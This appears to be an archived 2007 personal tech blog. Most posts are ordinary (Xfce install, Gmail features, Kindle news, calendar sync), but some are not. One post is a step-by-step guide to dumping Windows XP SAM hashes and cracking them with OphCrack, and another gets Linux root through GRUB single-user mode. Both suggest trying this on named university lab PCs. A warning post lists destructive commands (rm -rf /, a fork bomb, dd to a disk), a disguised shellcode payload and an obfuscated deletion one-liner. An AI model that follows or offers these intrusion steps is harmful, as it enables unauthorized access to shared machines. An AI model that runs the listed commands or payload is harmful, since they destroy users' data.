Monday, December 31, 2007

Alternate Window Managers : Installing Xfce 4.4.2 on Ubuntu



Gnome and KDE are running too slow on my system, even with a 1 gig RAM. With days of troubleshooting I have finally decided to move on.
I am currently searching for an alternative X Windows manager. In this first part of tutorial, I cover installing Xfce. In later weeks I'll try using fluxbox, IceWM, E17 and Openbox. And finally, I'll compare their speeds and usability.


First download the xfce4-4.4.2-installer.run installation file from Xfce website. Then follow these steps

apt-get install libice-dev libsm-dev libxpm-dev


apt-get install libxml2-dev libvte-dev libstartup-notification0-dev


apt-get install libhal-storage-dev libdbus-glib-1-dev libjpeg62-dev


chmod u+x xfce4-4.4.2-installer.run


./xfce4-4.4.2-installer.run


Note: I did get an "Failed to build xfce-mcs-manager" error, the first time I tried. Try the following too and rerun the installer.run file.
apt-get install build-essential gettext


#Alsa not found error
apt-get install libsound2-dev*



Phew! Finally, it is installed. For the faint-hearted just type
apt-get install xubuntu-desktop

This will setup everything. Only catch, 4.4.2 is still not available in Repo, so be content with the older release.

Hacking/Recovering windows XP passwords


Please note, this article is for educational purpose only.

Goal: To recover windows xp account passwords when you obviously don't have an admin privilege.

Prereq: 1. You either have access to booting via CD (in many places CD boots are disabled in bios)
2. Any other OS - XP or Linux is also installed to which you have access to.

Tools needed: OphCrak Live CD, rainbow tables

Lets start.


How does it work?

Generally XP account passwords are stored as hashes in the encrypted SAM file, located in c:\windows\system32\config\SAM
The process requires you to get a hashdump of this SAM file and pass it to OphCrack, which will then use this beautiful method involving rainbow tables to recover the password for you. Rainbow tables are way faster than the usual dictionary and brute force method.



1. If bios allows you to boot via a CD, you are in luck. Burn the OphCrak Live CD and it will take care of the rest. Simply specify which XP instance you want to recover the password.
It will automatically get a hash dump and start the recovery password.

2. Alternate way, the one I describe here in detail is using your other OS. Say, you already have Linux as the second OS. Get an access to it either using your legitimate account or using the "Hacking Linux root accounts via grub" article.

a) Download OphCrack from the website.

b) Download a rainbow table depending on your ram.

c) Copy SAM and SYSTEM file from the following location (assuming you know how to mount ntfs partitions)

cp /mnt/win_C/WINDOWS/SYSTEM32/Config/SAM ./


cp /mnt/win_C/WINDOWS/SYSTEM32/Config/SYSTEM ./

where /mnt/win_c is where your windows NTFS partition is mounted and the current folder is OphCrack/linux tools/ folder

d) Run the Bkhive and samdump2 tools

bkhive SYSTEM temp.txt

samdump2 SAM temp.txt > hashes.txt

both these are available in your OphCrack/linux tools folder

e) Run OphCrack. Load the rainbow table and the hashes.txt file and wait.
The process timing depends on the strength of the stored password.

Great! You have recovered your account password.
Note: You can selectively extract only "your" account password, if you do have any ;)
Now login using the username/password recovered and check.

Places to experiment: SOC 1 lvl 8 PC labs (NUS)

Caution: It is a criminal offense if you don't have the right to access the system. Also, accounts authenticated using LDAP cannot be recovered this way. There is generally a debugger account which will give you some admin rights to add remove users for the pc.

Sunday, December 30, 2007

Windows XP Tip : Resolving "NTLDR is missing" error

















I recently had a virus attack which corrupted my NTLDR and NTDETECT.COM.
XP refused to boot. Many folks think that the only way is to reinstall XP but here I'll show you how to recover these files and get back your XP booting up in 5 mins.


1. Pop in your Windows XP Installation CD and reboot.
Windows XP Setup starts.





2. Press R to enter Recovery console mode.
Select the installation instance and enter your admin password.


3. You now have access to the command prompt where you can enter commands to recover your installation. Some useful commands are - help, cd, map, chkdist etc. Help will display all commands available to you.

4. Type map to view all the disks. Keep note of the drive letter of you windows installation and the cd rom drive
map





5. Type the following commands to copy the ntldr and ntldetect.com files

copy d:\i386\ntldr c:


copy d:\i386\ntldetect.com c:


Where, c:\ is where your windows xp installation resides and d:\ is the cd drive letter. You can verify it from the result of the map command

6. Counter check if your boot.ini file is intact.
type c:\boot.ini


7. Voila! Your nltdr is recovered. Type exit to reboot.
exit


8. Results.












Monday, December 24, 2007

Hacking Linux root accounts via grub


This is a very common and popular way to reset root password if grub is not password protected by the system administrator.

Places you can try: SOC level 8 PC labs. They recently installed fc6 but forgot to protect grub ;)

Note: With great power comes great responsibilities. Use the root account with caution.


1. Switch on the pc and press a key to bypass the default OS boot.
2. Grub menu will show up.
3. Highlight the entry that displays the selected linux distro and type e
4. This takes you to the edit mode. Highlight the second entry (leave the rescue entry) and add single at the end to the boot entry

5. Once you have done that. Enter b
6. Your installed linux distro will reboot and take you to the init 1 or single or admin mode.

7. To add a new user, type
adduser guest


where guest is the name of new user you want to add.

8. To reset your or anyother users passwd
passwd <user>


The above mentioned way is a great way to reset your password in case you forgot it, or get access to a linux pc if grub is not protected.

Friday, December 21, 2007

Installing Flash and Java plugins in Flock


If you haven't guessed yet, Flock is based on firefox and supports most of its plugins.
Though firefox addons are not yet supported in Flock, Java and Flash plugins work right out of the firefox plugins folder
All you need are symbolic links to those plugins to your Flock plugin folder.

For instance,


~/temp/flock/plugins$ ln -s /usr/lib/firefox/plugins/* ./

Blogged with Flock

Monday, December 10, 2007

Remote Desktop to WinXP from Ubuntu..world of possiblities

This may sound vague. Why would you want to remote access your winXP box from Linux. Hmmm, think again.

Scenario 1: You have linux at work and winXP at home and you want to access some of the files.
Scenario 2: You have XP at work and linux at home and you wish to work from home
Scenario 3: Just for fun ;)

First glance and you would just reject the possibility of ever being able to do so. C'mon different OS's. WinxP's closed APIs. etc. Think again. Let me show you the wonders of technology and ofcourse linux.



1. Make sure you have activated remote desktop in your WinXP box.
2. Install grDesktop
#apt-get install grdesktop

3.Run Gnome Remote Desktop


4. The interface is very similar to windows remote desktop client. Enter the system ip, login username etc.


5. Congrats! You are in. You are in full control now ;)


6. A follow up on the wireless ad-hoc tutorial I posted few months back.
You can connect and disconnect your internet connection on the gateway win XP pc from wherever you are in your home. Another cool thing is shutting down the gateway pc after you are done surfing. Though the remote desktop doesn't give you explicit shutdown shortcut, we can still shutdown from the cmd. Simply go to Start > Programs > accessories > command prompt and type
shutdown -s


This opens to a world of possibilities. Though the speed of your experience depends on the underlying network and the rfc WinXP API, you can still browse the net, read docs, run presentations easily. I tried playing Counter Strike but the results weren't encouraging. Anyways, it opens you to a world of new possibilities to explore and play around.

Hope you enjoyed the article..and Kudos to open source ;)

Thursday, December 06, 2007

Updates, updates and more updates: Gmail


Just when you thought that Gmail was so awesome that it could never get better, think again. Google has been silently rolling out new features. Some are just eye candy but others are huge productivity boosts. In the post let me give you a glimpse of these new improvements...




1. Gtalk integration with AIM

Now you can talk to your AIM® friends using an integrated chat list right inside Gmail. Learn more ».



2. Colored labels

Better organize your email with new colored labels. Just click the color swatch next to each label to assign a color. Learn more »


3. Group chat and new emoticons

Group chat
Chat with multiple people without multiple windows. Invite your friends to a group discussion. To start a group chat, click 'Group chat' from the 'Options' menu when chatting.
Learn more »




New emoticons
Go from :) to and start sending richer expressions to your friends.
Learn more »










4 . Free IMAP


Sync your inbox across devices instantly and automatically. Whether you read or write your email on your phone or on your desktop, changes you make to Gmail will be seen from anywhere you access your inbox.

How it works on the iPhone

Set up device for IMAP (watch video)

Read and sort mail on your device

See changes instantly reflected in Gmail


Another way to use Gmail on your iPhone is through the browser. By going to m.gmail.com you get the full Gmail experience including conversation view, search, and more.

Learn how to set up IMAP on other devices


5. View as slideshow

With google launch of their new presentation tool, you can preview your ppts right from your gmail. Just click "View as slideshow" next to the .ppt attachment you want to preview. Since you can open .doc and .xls attachments with Google Docs and Spreadsheets too, there's no need to leave your web browser to check out your Gmail attachments. Learn More.


6. Increased attachment size - 20 MB

Now you can start sharing more of those home videos, large presentations and files you just can't seem to get smaller. We have doubled the allowable attachment size to 20 MB to make your Gmail space even more useful. Learn More


Did I miss any? Do leave your comments behind.

Friday, November 30, 2007

7 Deadly Sins in Linux



Linux is all about the experience, learning and adventure. Creative ways to solve existing problems, fast hacks and just playing around till you have the complete control. But there are some restrictions.

Here is the Noob's guide to the coolest but deadly commands/programs in linux..



1. Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.

rm -rf /
rm -rf .
rm -rf *


2. Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

mkfs
mkfs.ext3
mkfs.anything


3. Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

any_command > /dev/sda
dd if=something of=/dev/sda


4. Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.

In shell:

:(){:|:&};:


In perl
fork while fork


5. Tarbomb & Decompression bombs: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory. You should not touch data from an untrusted source

6. Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:


char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.

7. Cool Python scripts: Never copy paste scripts into your terminal without knowing what it is. For instance look at this snippet.

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up


[courtesy: UbuntuForums]

Monday, November 19, 2007

Amazon Kindle available now on Amazon -- free EVDO!


Engadget
Engadget
Engadget
By Thomas Ricker on kindle

It's here and looking just as busted as it did when we broke the Amazon Kindle eBook reader for you last year. $399 (and free 2 day shipping) with access to 88,000 books including 100 of the 112 New York Times best sellers. No WiFi here, Amazon's Whispernet service is FREE and based on Sprint's EVDO: "Amazon pays for Kindle's wireless connectivity so you will never see a monthly wireless bill for shopping the Kindle Store." Whispernet allows Kindle owners to wirelessly shop the Kindle Store, dowload and receive content -- and it works out the box, no setup required. All new release books cost $9.99 as do books found on the NYT best sellers list. Newspaper subscriptions cost $5.99 to $14.99 per month and Kindle Magazines cost between $1.25 and $3.49 per month -- each is available for a free 2 week trial. Oddly, blogs will cost you $0.99 per month to subscribe. All purchased content is stored as a backup on Amazon's site. Running down the specs again: internal storage for 200 titles (more via SD expansion), battery that lasts for days (2 hour recharge), 10.3 ounces, built-in dictionary and Wikipedia, and plenty more. While the reader itself could be mistaken for a Handspring device from the 90s, the service itself certainly makes for a compelling proposition.

Read -- Kindle Store
Read -- Kindle device
Read -- Video demonstration



Amazon Kindle Official Details: the "iPod of Reading" [Official]

By Matt Buchanan on Wireless (Source: Gizomodo)

amazon_kindle_1118.jpgThere's a lot to digest in Newsweek's seven-page all-out feature. Amazon CEO Jeff Bezos sums it up: "This isn't a device, it's a service." Kindle starts shipping tomorrow for $399 and is "a perpetually connected Internet device" running off of EV-DO—it calls the service "Whispernet." It's totally computer independent: You browse for books (88,000 at launch) and buy them in a "one-touch process," it comes with a personal Kindle email address and it can browse the regular internet—keyboard sounds useful now, doesn't it?

New York Times bestsellers and hardback new releases will go for $9.99, with classics going as low as $1.99. Through the service, which is an extension of the Amazon store, you also can subscribe to newspapers (New York Times, Wall Street Journal, Washington Post) and magazines, which are automatically sent to Kindle when they drop on the wire.

Talking about the hardware itself, it'll hold 200 books on board, though you can supplement with unspecified memory cards. It'll get up to 30 hours of reading per charge and weighs 10.3 ounces. So, why does such a potentially disruptive device look so very plain? They wanted it to look like "an austere vessel of culture." The moniker Kindle is from the same line of thinking, " the crackling ignition of knowledge." But, thankfully, it doesn't get warm itself.

Some obvious questions are left though, mostly about the "always-on" connection—is the EV-DO-based Whispernet service included in the $399? If not, what's the pricing on that? And what are its limits, since you can go out onto the real web? Odds are, Bezos himself will reveal the answers tomorrow.

The goals here are pretty lofty: "Amazon believes it has created the iPod of reading." We really, really dig Jeff's vision, "that you should be able to get any book—not just any book in print, but any book that's ever been in print—on this device in less than a minute," so we hope about as much as he does that this little beige slab lives up to all the wonderful that they're promising. [Newsweek]

Source: Gizmodo

Friday, November 16, 2007

Thursday, November 15, 2007

MySql: Access denied for user 'root'@'localhost'

By default, MySql has no root password when installed, hence the following should work in most cases. But in some cases, mysql and mysqladmin simply throw Access denied message and you have no clue how to change the password after that.

$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

Here is an elegant solution for this highly irritating but common problem.


This is how you reset the password.

1. Start the mysql server instance or daemon with the --skip-grant-tables option. (security setting)

$ mysqld --skip-grant-tables

2. Then Execute these statements.

$ mysql -u root mysql
$mysql> UPDATE user SET Password=PASSWORD('my_password') where USER='root';
$mysql> FLUSH PRIVILEGES;

3. Finally, restart the instance/daemon without the --skip-grant-tables option.

$ /etc/init.d/mysql restart

4. You should be able to connect with your new password.

$ mysql -u root -p
Enter password: my_password

courtesy: Shawn Tucker @ MySql Forums

Wednesday, November 14, 2007

Official Nokia N82 press shots!


Straight from the source and about 21 hours early, Engadget's got the 5 megapixel Nokia N82 press shots. No detailed press release but really, what more do you need to know that you don't know already? Ah hell, we'll run down the rumored specs for you one more time: quad-band GSM, 2100MHz HSDPA for Europe, WiFi, GPS, FM Tuner, Bluetooth, 3.5-mm headphone jack, Carl Zeiss lens with Xenon flash, automatic rotating 2.4-inch QVGA display, and microSD expansion.

[source: Engadget ]

Desktop Blogging : ScribeFire for Ubuntu


Bloggers web interface really frustrates me and is not ideal for writing long articles ;). I was also looking for a nice replacement for BloGTk., which had served well even with it's extensive set of limitations and bugs. There are tonnes of other alternatives for linux like the Gnome Blog poster, Drivel Journal editor. You could also use google Docs to directly post on to blogger.
For a list of such apps, visit :

http://beans.seartipy.com/2007/11/12/desktop-blogging-editors-for-gnulinux-users/


Finally I ended up trying ScribeFire. The beauty of firefox addons are that they are cross-platform. This brings some seriously useful functions to linux. For instance, DownThemAll which easily is the best download manager that linux has.


ScribeFire is good, easy to use, has a nice interface with tonnes of features. It even connects to your del.icio.us account and fetches your tags and bookmarks. It has both preview and code panels, a technoarti search and a ftp/html picture upload function (you need to have some hosted web space to do this)

There are some flaws too, which I hope the developers can fix soon. For instance, the wonderful account wizard connected and extracted everything from my blogger account, but the tags weren't imported. The Html view really has some bugs ;) and it still doesn't support the image upload that blogger supports. My guess that the blogger API doesn't allow 3rd party apps to upload images to its servers.
You can use Fireuploader addon, to upload your pics to flickr or picasa and then use the link with ScribeFire. Personally I prefer blogger due to its image upload function.


Anyways, overall a nice app, for those who love to script their blog ;) will love the wide and feature rich tool set of ScribeFire.


Tuesday, November 13, 2007

Android SDK is out !!





Google just released the Android SDK and a 10 million$ developer competition to get the ball rolling for this new platform.

Here are some videos of the new platform..



















Monday, November 12, 2007

Synchronising your calendars with google Calendar



This is a real life problem that many face. You have a calendar in your cell phone for immediate appointments, you use google calendar extensively, for the sms reminder and public event sharing. You also have Sunbird/Thunderbid to manage your local schedules.

Wouldn't it be great if you can synchronize them all at once. Let me show you how easy it is


Step1: Sync Sunbird/Thunderbird with GCalendar


Thunderbird has a nice addon called Lightening, which adds calendar support to Thunderbird. It makes for a killer Sunbird/KDE PIM replacement.
Once you are done installing it,
install the Google Calendar Provider addon.
This gives you bidirectional ability to read and write google calendars

Setting up your remote google calendar on thunderbird/sunbird is very easy. Just go to File > New > Calendar > Network Calendar > Google Calendar
and paste the private html url of your google calendar



Read this graphical tutorial, if you don't know where to find it.

Congrats!. That's it. Once everything is setup, you can read/write your google calendar directly from Thunderbird.




Step2: Sync your phone with GCalendar

There are lots of tools available that help you do this. My personal favorite is GooSync. This allows you to directly sync with your google calendar over the air via internet. Register for a free account and try it. The steps are pretty explanatory.
All you need to do is :
a) select your phone model,
b)give your phone no. so that it can send you the sync settings
c) Select your google id by authorising it to access your calendar
d) Select the calendar (free version allows you to sync only 1 calendar)
e) Wait for the settings sms.
f) Save the settings in your phone and sync.
(note you need an access to the internet on your phone)














viola! Your phone is now in sync with your thunderbird and google Calendar.
No more missed appointments, hassles of unsynchronized calendars and using complex tools (specially in linux) to sync your mobile and your desktop calendar

Saturday, November 10, 2007

It's raining Veronica Belmont this Week!




We remember the lovely Veronica Belmont from her days as an executive editor and producer at CNET
After CNET, she joined Mahalo and has been working there ever since on a video podcast, called Mahalo Daily.

Lately, She's been doing guest appearances in all my favorite podcasts and it is good to see her as exuberant and lively as always. Few weeks back she was on dl.tv. This week she appeared on TWiT, revision3 Tekzilla and Mahalo Daily (finally!)

Here are the vcasts...


Mahalo Daily episode 4





Revision3 Tekzilla episode





Wednesday, November 07, 2007

World class University starts a module on Facebook Applications programming



National University of Singapore, a famous university in SE Asia has started a course on developing Facebook Apps. Cleverly termed as a Software development for evolving platforms, it's open to students from all background - Arts, Science, Computers etc, with absolutely no programming experience needed.

So how many are actually interested in doing this module ?...

digg story



The intial feedback from some of my friends was really surprising. They were actually looking forward to doing it next semester. The ones who graduated are a little upset of not having similar opportunities during their time.

So what exactly is the module about?
It's typically a software engineering course for facebook. Team of students have to design and implement a new application for facebook. Along with the application, a presentation and a business plan might be needed.

Is it heavy?
All SOC (School of Computing) modules are heavy. If people from other backgrounds wish to experience the crunching, painful, laborious life of SOCians, they should take this, as the pre-requisite is highly subsidized as its the first outing of the module, and they want a nice attendance.